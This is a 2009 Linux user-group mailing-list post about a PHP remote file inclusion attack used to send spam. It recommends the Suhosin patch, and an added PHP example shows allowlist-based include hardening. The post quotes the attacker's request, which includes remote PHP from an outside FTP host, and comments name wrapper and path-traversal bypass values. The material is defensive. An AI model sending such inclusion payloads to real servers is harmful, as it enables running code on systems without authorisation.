[nSLUG] apache used to generate spam

Hatem Nassrat hnassrat at gmail.com
Mon Jun 8 00:03:45 ADT 2009


On Mon, Apr 20, 2009 at 1:31 PM, Hatem Nassrat <hnassrat at gmail.com> wrote:
> On Mon, Apr 20, 2009 at 11:39:20AM -0300, D G Teed wrote:
[...]
>> The spammer calls this page with their own value set as:
>>
>> ?this=ftp://wheelingboys.com.br:515151@wheelingboys.com.br/fotos/wallpaper/jamaican.php
>
> You got to love PHP eh?

Opening old wounds ;-)

I have installed apache and PHP (unfortunately many things are done
with php these days) and I found something strange: my server
signature looked weird.

    Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.1 with Suhosin-Patch
    Server at localhost Port 80

I decided to see what's this "Suhosin-Patch" that I have installed and
I was shocked. Somebody actually cared to try to fix some of the
security holes in php. If this patch was installed the above attack
would have never happened. Here is an excerpt from the "Why?" (to
install the patch) page:

"Another common error in these books is that they spread the urban
legend that the most dangerous problem within PHP “remote code
inclusion vulnerabilities” can be fixed by disabling allow_url_fopen
in the configuration (or allow_url_include in PHP 5.2.x). This
information is simply wrong, because these configuration directives do
NOT protect against attacks through php://input or data:// URLs. Our
Suhosin and the former Hardening-Patch are the only available
protections that close all URL include attacks."

Reading its other features, this seems to be an awesome patch to have
installed if you require running PHP code, even if it's your own. IMHO
in a webhosting setting, where script kiddies lurk around your servers,
this is a must-install.

-- 
Hatem Nassrat

PS. some (word starts with S and ends with d) guy implemented remote
code inclusion for Ruby; the following is his page and the reddit
comments page:

    http://blog.astrails.com/2009/5/12/ruby-http-require
    http://www.reddit.com/r/programming/comments/8jvb1/yes_we_can_require_over_http_that_is/c09ikkx
(actually this is a link to my comment on that page :) )
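An added example (mine, not code from the post, from the original report, or from Suhosin) of what the fix for the included-page pattern in the thread looks like in PHP once you stop trying to filter URLs and instead only allow a fixed set of local files; PAGE_DIR and the page names are assumptions:

```php
<?php
// Added example, not code from the list post or from Suhosin. It shows the
// hardened form of the pattern behind the reported attack: a page that did
//   include($_GET['this']);
// and was called with ?this=ftp://host:port@host/path.php. Turning off
// allow_url_fopen / allow_url_include blocks ftp:// and http:// targets but,
// as the quoted Suhosin text says, not php://input or data:// wrappers, so
// user input must never reach include() at all. The parameter is mapped
// through a fixed allowlist and the result is resolved to a real path under
// one directory. PAGE_DIR and the page names are hypothetical.

define('PAGE_DIR', __DIR__ . '/pages');

// Allowlist: request parameter value => file name inside PAGE_DIR.
$pages = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'gallery' => 'gallery.php',
];

/**
 * Return the absolute path to include for $name, or null when $name is not
 * an allowlisted page. Because only exact allowlist keys match, values such
 * as "ftp://...", "php://input", "data://text/plain;base64,..." and
 * "../../etc/passwd" all return null without any URL-pattern filtering.
 */
function resolve_page(string $name, array $pages): ?string
{
    if (!array_key_exists($name, $pages)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $pages[$name]);
    // realpath() returns false for a missing file; also refuse a file that
    // resolved (e.g. through a symlink) to somewhere outside PAGE_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// ?this[]=x would arrive as an array, so only accept a plain string.
$name = $_GET['this'] ?? 'home';
$page = is_string($name) ? resolve_page($name, $pages) : null;
if ($page === null) {
    http_response_code(404);   // log the rejected value here to spot probes
    exit('No such page');
}
include $page;
```

Rejected values are worth logging: a burst of 404s on this page with a scheme in the parameter is exactly the probing the original report describes.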

